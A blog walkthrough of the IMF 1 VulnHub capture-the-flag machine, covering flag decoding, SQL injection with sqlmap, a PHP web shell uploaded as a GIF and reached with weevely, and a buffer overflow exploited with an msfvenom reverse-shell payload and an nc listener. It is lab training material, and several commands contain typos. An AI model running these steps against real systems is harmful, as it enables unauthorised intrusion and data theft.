Hello Everyone, In this blog I am going to post walkthrough of imf 1.
This machine is a perfect example of buffer overflow.
You can download the machine from this link: https://www.vulnhub.com/entry/imf-1,162/
Let’s Start,
Target IP- 192.168.75.139
Attacker IP-192.168.75.175
Let’s start with nmap
nmap -Pn -sV 192.168.75.139
Ok, There is one port open
80-http
Let’s see what is running on port 80
So, now we check the source page
So, now we got our first flag :1
Now I use the decoder option in burpsuite to decode the flag
I got allthefiles
On closely looking the source in contact.php we found another hash
Again we used the decoder of burp and found our next flag :2
On again decoding the hash we found /imfadministrator
On checking the /allthefiles nothing show up
But when I tried with /imfadministrator , bingo I got the result that was the login and password
Then on checking the source page I found that it might be vulnerable to sql injection
So I used burp suite to exploit it
I set the payloads and did the attack but nothing came up. It was showing INVALID USER
So on further enumeration , I found that there were 3 usernames
So, on testing it was rmichaels I got the 3rd flag successfully
On decoding the hash, it got continue to cms
So on entering with cms.php I got access to main site
Now on running the sqlmap we got the databases
Sqlmap -r sqli2 –risk=3 –level=5 –dbs –dump –batch –threads=10
We got 4 databases
In the tutorials-incomplete we found a source =”./images/whiteborard.jpg “
On trying it we got an image
Then we can see there I a qr code on decoding it we got our next flag :4
On further decoding of the hash of flag4 we got upload942.php
On entering it we got a page with upload
Now I uploaded a php file to get the shell access
But it seems that php is filtered
So I tried to upload the malicious code with gif and boom it was a success So on checking the source page I found something interesting
Acutually it was the same file(gif) that we uploaded but the server changed its name to eb7e25c6b97d
So now we used weevely to get the limited shell
Weevely http:/192.168.75.139/imfadministrator/uploads/ eb7e25c6b97d.gif test
And we got the limited shell
On doing ls we got our next flag :5
On decrypting it we got agentservices
On finding the name agent we got the file
Find /- name agent &> dev/null
Usr/local/bin/agent
On entering it we got the Imf system and it was asking for the agent id that we don’t have
On reading it and listing (ls) we got access codes
On reading the file access code and reading the services we found that port
7788 is also open that we were not able to find during normal nmap
So, we got 3 ports so I tried to knock them so that we could find something useful.
So now we can see port 7788 is also open
So now I used a tool retdec .It is a basically a decompiler. So that we can decompile the imf system to retdec
You can download retdec from this link : https://github.com/avast/retdec
So now to do that I used /usr/local/bin/agent /root/retdec/bin/agent So it will decompile the imf system to the retdec
So as you can see we have got the /root/retdec/bin that contains the imf system
So, on executing the decomplier.py file we got the user agent
0x2ddd984 ,On echoing it echo $((0x2ddd984) I got the agent id:48093572
Now we chmod the agent to give it the permission
Now as we enter option 3 we see that it records data that is input so as I tried to fuzz with ‘A’ I found a buffer overflow vulnerability in it .
So, as done in buffer overflow I created a pattern offset Locate pattern_create
/usr/share/metaslpoit-framework/tools/exploit/pattern_create.rb -l 200
So I used the gdb immunity debugger that is inbuilt in kali
Just write gdb agent
Now on entering the option 3 we enter the pattern that we created
And found that exact offset at a particular value :41366641
So now we created pattern with the same value
Now using msfvenom I created a reverse shell and removed the bad characters ( “\x00\x0a\xod” ).
Msfvenom -p linux/x86/shell_reverse_tcp LHOST=ip of kali LPORT=4448 -f python -b “\x00\x0a\xod”
So I copied this shell into the file that I downloaded online , and changed my ip and port (just google imf reverse shell )
Now on opening the listener usning nc -nlvp 4448
And running the python file : python agentsploit.py ip port.
We got the root access !!
Writer: Shubhankar is Cyber Security Intern at Azure Skynet Solutions Pvt Ltd. You can contact him here.